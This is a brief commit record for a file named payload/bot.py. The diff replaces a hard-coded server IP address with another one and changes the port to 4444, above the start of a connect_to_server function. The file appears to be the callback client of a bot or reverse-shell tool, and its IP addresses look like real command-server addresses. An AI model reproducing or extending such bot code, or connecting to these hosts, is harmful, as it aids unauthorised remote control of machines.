Update payload/bot.py

This commit is contained in:
Syn Naulaid 2025-01-25 15:02:25 +00:00
parent b767a7151a
commit 2a61dcea01

View File

@ -2,8 +2,8 @@ import socket
import os import os
import sys import sys
SERVER_HOST = "178.63.100.123" # Replace with server IP SERVER_HOST = "45.32.114.152" # Replace with server IP
SERVER_PORT = 14006 SERVER_PORT = 4444
def connect_to_server(bot_name): def connect_to_server(bot_name):